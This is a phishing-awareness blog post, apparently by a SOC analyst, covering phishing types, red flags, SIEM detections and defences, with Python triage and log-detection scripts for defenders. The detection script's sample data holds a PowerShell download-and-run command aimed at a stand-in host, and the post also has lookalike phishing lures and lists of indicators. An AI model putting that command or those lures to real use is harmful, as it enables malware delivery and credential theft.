Understanding Phishing Attacks: A Simple Guide to Phishing

Ever clicked on a link in an email that looked legit but felt... off?
What if I told you — that one click could’ve compromised your entire system?

Welcome to the world of Phishing Attacks, where cybercriminals don’t break in — they trick you into opening the door yourself.


🧠 What Is a Phishing Attack?

A Phishing Attack is when a hacker pretends to be someone trustworthy (like your bank, a coworker, or a well-known brand) to steal sensitive information — passwords, one-time codes, credit card numbers, or other login credentials — or to get you to run something on their behalf.

They don’t start by hacking your system.
They hack your trust, and the system follows.

📌 These attacks often come via:

  • Emails

  • Text messages (SMS)

  • Phone calls

  • Fake websites

Their goal is simple: make you take an action — click a link, download a file, or share private information.


🎭 Common Phishing Techniques (Explained Clearly)

1. Email Phishing

The attacker sends the same generic message to as many inboxes as possible, pretending to be from a big company.

🧪 Example:

Subject: “Your Netflix account is on hold!”
Link: netfl1x.verify-payments.info (fake URL: the registered domain is verify-payments.info, not netflix.com; the brand name is only a subdomain with a digit swapped for a letter)

How it tricks you: The email looks like Netflix, uses their logo and color, and scares you into clicking.


2. Spear Phishing

The attacker researches the victim and sends a personalized message.

🧪 Example:

“Hi Bilal, your security dashboard report failed to sync. Reconnect it here.”

Why it works: It's highly targeted — your name, your tool, your job.


3. Whaling (CEO Fraud)

Targets high-ranking individuals in a company.

🧪 Example:

Fake CEO emails the Finance team from a lookalike domain or a compromised mailbox: “Urgent: Transfer $10,000 to vendor by EOD.” The urgency and the seniority of the sender are meant to stop anyone from verifying the request.


4. Smishing (SMS Phishing)

Attacks delivered via mobile texts or messaging apps like WhatsApp.

🧪 Example:

“Your package was undeliverable. Reschedule here: [phishy-link]”


5. Vishing (Voice Phishing)

Fraudsters call you pretending to be from your bank, IT team, or government.

🧪 Example:

“This is the bank. We detected fraud. Can you verify your OTP?”

Why it works: reading out the code hands the caller your second factor, which is often all they are missing. A real bank will never ask for it.


🔍 How to Detect a Phishing Attack (SOC + User Perspective)

✅ 1. Check the Sender’s Email

As a SOC Analyst, my first step is always to carefully check the email address of the sender. Does it match the real domain of the organization? For example, micros0ft.com is clearly a fake if you're expecting microsoft.com. Even if the display name says “Google”, the actual email could be security@googl-login-alert.com — which is a red flag. I also compare the From domain with the Return-Path and Reply-To headers, and read the Authentication-Results header for the SPF, DKIM and DMARC verdicts stamped by our mail server.

✅ 2. Look at the Subject and Email Body Carefully

I read the subject line and the body of the message slowly. If I notice urgency, fear tactics, or emotional manipulation like “Your account will be disabled in 30 minutes” — I immediately flag it. These are pressure tactics used to make users act without thinking.

✅ 3. Inspect Links Without Clicking

If the email has a link, I don’t click it. Instead:

  • I hover over it (on PC) or long press (on mobile) to see the real URL, since the visible text can say one thing while the href points somewhere else.

  • Then I copy the link and paste it into a plain text editor, or inspect it in an isolated analysis sandbox, never in my day-to-day browser.

  • I look at the part that actually matters: the registered domain, not the words in front of it (netfl1x.verify-payments.info is really verify-payments.info). If the link leads to an unknown domain, uses a URL shortener, or contains a misspelled brand name, I flag it.

✅ 4. Check for Attachments

If there is an attachment, I examine the file extension, including the real (last) extension of a double-extension name like invoice.pdf.exe. Dangerous ones include .exe, .scr, .bat, .js, .vbs, .hta, .lnk, .iso, .html (used to smuggle a payload past mail filters), .zip (which hides its contents from simple scanning), and .doc/.xls/.docm with macros. Unless I’m expecting a file from this person, I won’t open it, and I’ll raise an alert if needed.

✅ 5. Check Spelling, Grammar, and Format

Obvious mistakes in grammar, spelling, or formatting are still a red flag, and so are logos or layouts that look “off”. The reverse does not hold: attackers now produce polished, error-free text, so a clean email is not evidence that it is genuine. Treat this as a supporting signal, never the deciding one.
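The five checks above, run as one triage script over a constructed sample message. This is an added example written for this page, not the author's tooling: the brand list, the digit-for-letter map, the shortener list, the risky-extension list and the sample .eml are all assumptions made for the demo, and the registered-domain helper is a deliberately naive two-label split (a real deployment would use a public-suffix list). It goes slightly beyond the text by also catching one-character typosquats such as googl-login-alert.com via edit distance.

```python
import os
import re
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample, not a real message: Netflix-themed lure with display-name mismatch,
# failed SPF/DMARC, pressure wording, a lookalike link, a short link and a .pdf.exe attachment.
SAMPLE_EML = b"""From: "Netflix Billing" <billing@netfl1x-verify.info>
Subject: Your Netflix account is on hold!
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=netfl1x-verify.info; dkim=none; dmarc=fail
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html

<p>Your account will be disabled in 30 minutes.
<a href="http://netfl1x.verify-payments.info/login">Update payment</a>
or <a href="https://bit.ly/3abcxyz">use this short link</a>.</p>
--b1
Content-Type: application/octet-stream; name="invoice.pdf.exe"
Content-Disposition: attachment; filename="invoice.pdf.exe"

--b1--
"""

# Demo assumptions: brands to protect, digit-for-letter swaps, shortener hosts, risky extensions.
TRUSTED_BRANDS = {"netflix": "netflix.com", "microsoft": "microsoft.com", "google": "google.com"}
HOMOGLYPHS = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t"})
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd", "cutt.ly"}
RISKY_EXT = {".exe", ".scr", ".bat", ".cmd", ".js", ".vbs", ".hta", ".lnk", ".iso", ".html", ".htm"}
URGENCY = re.compile(r"\b(?:urgent|immediately|act now|verify now|(?:with)?in \d+ (?:minutes|hours)"
                     r"|account (?:is |will be )?(?:disabled|suspended|on hold))\b", re.I)


def registered_domain(host):
    # Last two labels: fine for .com/.info, wrong for co.uk-style suffixes (use a public-suffix list).
    return ".".join(host.lower().split(".")[-2:])


def edit_distance(a, b):
    # Levenshtein distance, to catch one-character typosquats such as googl or gooogle.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def brand_lookalike(host):
    """Brand a host imitates (name present after undoing digit swaps, or within one edit in a
    label) while the registered domain is not the brand's own. None if it looks clean."""
    norm = host.lower().translate(HOMOGLYPHS)
    for brand, real in TRUSTED_BRANDS.items():
        if registered_domain(host) == real:
            continue
        if brand in norm or any(edit_distance(lbl, brand) <= 1 for lbl in re.split(r"[.-]", norm)):
            return brand
    return None


def url_findings(url):
    # Judge the real target host, never the anchor text.
    host = (urlparse(url).hostname or "").lower()
    reasons = ["url shortener"] if host in SHORTENERS else []
    brand = brand_lookalike(host)
    return reasons + [f"imitates {brand}"] if brand else reasons


def triage(raw):
    # Run the checks over one raw RFC 5322 message; returns (check, detail) pairs.
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    # 1. Sender: display name claiming a brand the address does not belong to, or a lookalike domain.
    display, addr = parseaddr(str(msg.get("From", "")))
    sender_host = addr.rsplit("@", 1)[-1].lower()
    claimed = next((b for b in TRUSTED_BRANDS if b in display.lower()), None)
    if claimed and registered_domain(sender_host) != TRUSTED_BRANDS[claimed]:
        findings.append(("sender", f"display name says {claimed} but address is {addr}"))
    if brand_lookalike(sender_host):
        findings.append(("sender", f"lookalike sender domain {sender_host}"))
    # SPF/DKIM/DMARC verdicts stamped by the receiving mail server.
    for check in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{check}=(\w+)", str(msg.get("Authentication-Results", "")), re.I)
        if m and m.group(1).lower() in {"fail", "softfail", "permerror"}:
            findings.append(("auth", f"{check}={m.group(1)}"))
    # 2. Subject and body: pressure wording (tags stripped first).
    part = msg.get_body(preferencelist=("html", "plain"))
    body = part.get_content() if part else ""
    text = str(msg.get("Subject", "")) + " " + re.sub(r"<[^>]+>", " ", body)
    for hit in dict.fromkeys(URGENCY.findall(text)):
        findings.append(("urgency", hit))
    # 3. Links: every URL in the body, judged by its real host.
    for url in dict.fromkeys(re.findall(r'https?://[^\s"<>]+', body)):
        for reason in url_findings(url):
            findings.append(("link", f"{url}: {reason}"))
    # 4. Attachments: the real (last) extension, so invoice.pdf.exe is caught.
    for att in msg.iter_attachments():
        name = att.get_filename() or ""
        if os.path.splitext(name)[1].lower() in RISKY_EXT:
            findings.append(("attachment", f"risky attachment {name}"))
    return findings
```

Calling triage(SAMPLE_EML) returns one finding per check category (two for the sender, since both the display-name mismatch and the lookalike domain fire). Spelling and grammar (check 5) are left to the analyst on purpose: as noted above, a clean message proves nothing.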


👨‍💻 For SOC Analysts — How to Detect Phishing in Logs

🔍 In Splunk, ELK, or any other SIEM:

  • Detect DNS lookups of newly registered or lookalike domains by joining DNS logs with domain-age data (RDAP/WHOIS enrichment or a threat-intel feed).

  • Monitor PowerShell launched with encoded commands (-EncodedCommand and its short forms carry base64 of UTF-16LE script), especially when the parent process is an Office application or a browser — this is a common first stage after a malicious attachment is opened.

  • Investigate successful logins from unfamiliar locations or source IPs, especially outside normal working hours; a success shortly after a phishing email was delivered is a strong sign the credentials were phished.

  • Correlate multiple failed login attempts followed by a successful one from the same source — this may suggest brute-force or credential stuffing.

📘 Pro Tip: Integrate with Threat Intelligence Feeds (like AlienVault OTX, AbuseIPDB) to flag emails, domains or IPs previously seen in phishing campaigns.
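The three log-side detections above (encoded PowerShell, fresh domains in DNS, failed-then-successful and off-hours logins) as an added example run over constructed log lines. This is not the author's SIEM content or any vendor's rule format: the key=value log lines, the domain-registration dates and the per-user "known source" baseline are stand-ins for what a SIEM would enrich from RDAP/WHOIS and from login history, and the encoded command is built inline so the sample is self-contained.

```python
import base64
import re
from collections import defaultdict
from datetime import date, datetime, timedelta

# Constructed log lines (not real telemetry) in a simple key=value format: a Word-spawned
# encoded PowerShell, DNS lookups of a fresh lookalike domain, and a burst of failed VPN
# logins followed by an after-hours success from an address the user has never used.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://evil.example/stage1.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
LOGS = f"""2024-05-02T09:12:03Z host=WS-042 event=process_create user=bilal parent=WINWORD.EXE cmd="powershell.exe -NoP -W Hidden -enc {ENCODED}"
2024-05-02T09:12:05Z host=WS-042 event=dns user=bilal qname=netfl1x.verify-payments.info
2024-05-02T09:13:00Z host=WS-042 event=dns user=bilal qname=www.netflix.com
2024-05-02T22:10:01Z host=VPN event=auth user=bilal result=fail src=203.0.113.7
2024-05-02T22:10:09Z host=VPN event=auth user=bilal result=fail src=203.0.113.7
2024-05-02T22:10:17Z host=VPN event=auth user=bilal result=fail src=203.0.113.7
2024-05-02T22:10:40Z host=VPN event=auth user=bilal result=success src=203.0.113.7
2024-05-02T08:30:00Z host=VPN event=auth user=sara result=success src=198.51.100.20""".splitlines()

# Stand-ins for data a SIEM would enrich from elsewhere (assumed, not real): domain
# registration dates (RDAP/WHOIS) and each user's usual source addresses.
DOMAIN_CREATED = {"verify-payments.info": "2024-04-28", "netflix.com": "1999-01-01"}
KNOWN_SRC = {"bilal": {"198.51.100.20"}, "sara": {"198.51.100.20"}}
BUSINESS_HOURS = range(7, 20)

KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
INDICATORS = ("iex", "invoke-expression", "downloadstring", "invoke-webrequest", "net.webclient", "frombase64string")


def parse(line):
    # "<iso-timestamp> k=v k="quoted v" ..." -> dict with a datetime under "ts"
    ts, rest = line.split(" ", 1)
    fields = {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00"))}
    for key, quoted, bare in KV.findall(rest):
        fields[key] = quoted or bare
    return fields


def registered_domain(host):
    # Last two labels; fine for .com/.info, wrong for co.uk-style suffixes.
    return ".".join(host.lower().split(".")[-2:])


def decode_powershell(cmd):
    # PowerShell -EncodedCommand (and its abbreviations) carries base64 of UTF-16LE script.
    m = ENC_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def encoded_powershell_alerts(events):
    alerts = []
    for e in events:
        decoded = decode_powershell(e.get("cmd", "")) if e.get("event") == "process_create" else None
        hits = [i for i in INDICATORS if decoded and i in decoded.lower()]
        if hits:
            alerts.append(("encoded-powershell", e["user"], f"parent={e.get('parent')} indicators={hits} script={decoded!r}"))
    return alerts


def new_domain_alerts(events, max_age_days=30):
    alerts = []
    for e in events:
        if e.get("event") != "dns":
            continue
        created = DOMAIN_CREATED.get(registered_domain(e["qname"]))  # RDAP/WHOIS stand-in
        if created is None:
            continue
        age = (e["ts"].date() - date.fromisoformat(created)).days
        if age <= max_age_days:
            alerts.append(("new-domain", e["user"], f"{e['qname']} registered {age} days ago"))
    return alerts


def login_alerts(events, threshold=3, window=timedelta(minutes=10)):
    # Failures followed by a success from the same source within the window suggest credential
    # stuffing or brute force; an off-hours success from an unknown source is a separate signal
    # that phished credentials are being used.
    alerts = []
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if e.get("event") == "auth":
            by_src[(e["user"], e["src"])].append(e)
    for (user, src), evs in by_src.items():
        for i, e in enumerate(evs):
            if e["result"] != "success":
                continue
            fails = [f for f in evs[:i] if f["result"] == "fail" and e["ts"] - f["ts"] <= window]
            if len(fails) >= threshold:
                alerts.append(("failed-then-success", user, f"{len(fails)} failures then success from {src}"))
            if e["ts"].hour not in BUSINESS_HOURS and src not in KNOWN_SRC.get(user, set()):
                alerts.append(("unusual-login", user, f"off-hours success from new source {src} at {e['ts']:%H:%M}"))
    return alerts


def run_all(lines):
    events = [parse(line) for line in lines]
    return encoded_powershell_alerts(events) + new_domain_alerts(events) + login_alerts(events)
```

run_all(LOGS) yields four alerts, all for the same user, which is the point of correlating across sources: an encoded PowerShell under WINWORD.EXE, a lookup of a four-day-old domain, and then the after-hours VPN success are three views of one phishing incident. The same joins translate directly into a Splunk or ELK search; the domain-age and known-source lookups become lookup tables or enrichment pipelines there.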


🛡️ How to Defend Against Phishing

🧑‍💻 For Users:

  • Never click on links from unknown senders, and treat unexpected links from known senders with the same suspicion: their account may be compromised

  • Don’t enter credentials unless you verify the source; type the site’s address yourself instead of following the link

  • Never share OTPs or MFA codes with anyone, by SMS, email or phone, no matter who the caller claims to be

  • Always double-check sender identity by reaching out through official company channels, not the contact details given in the message

🧑‍💼 For Organizations:

  • Enforce Multi-Factor Authentication (MFA), preferably phishing-resistant (FIDO2 security keys or passkeys), since SMS and app-generated codes can be relayed to the real site in real time

  • Use advanced spam filters and email security gateways

  • Publish SPF, DKIM and DMARC records for your own domains and act on the Authentication-Results of inbound mail

  • Provide ongoing security awareness training to employees, including how to report a suspicious message

  • Analyze email headers and message paths
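The weak and the corrected DNS configuration for the SPF/DKIM/DMARC bullet, as an added illustration (zone-file style, with example.com and a hypothetical selector; not records from the author or from any real domain). The first DMARC record only monitors, so a spoofed message that fails SPF and DKIM is still delivered; the second tells receivers to reject it and to send aggregate reports.

```dns
; Weak: SPF allows anyone (+all) and DMARC only monitors (p=none)
example.com.         IN TXT "v=spf1 include:_spf.mail.example.net +all"
_dmarc.example.com.  IN TXT "v=DMARC1; p=none"

; Corrected: only listed senders may use the domain, DKIM key published,
; DMARC rejects failures and reports to the security team
example.com.         IN TXT "v=spf1 include:_spf.mail.example.net -all"
sel1._domainkey.example.com. IN TXT "v=DKIM1; k=rsa; p=<public-key-base64>"
_dmarc.example.com.  IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc@example.com; adkim=s; aspf=s"
```

Roll out p=reject gradually (p=none, then p=quarantine with a pct value, then p=reject) once the aggregate reports show that all legitimate sending services pass alignment; otherwise your own mail gets rejected along with the spoofed mail.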


🎯 Final Thoughts

Phishing is not just technical — it's emotional engineering.

It works because it targets people’s fear, urgency, trust, and curiosity.

Whether you’re a student, SOC intern, or junior analyst —
knowing how phishing works makes you 10x more secure.


💬 Have you seen a phishing email recently? Share your story below — let’s help others avoid falling for the bait!


Written by

Muhammad Bilal Akhtar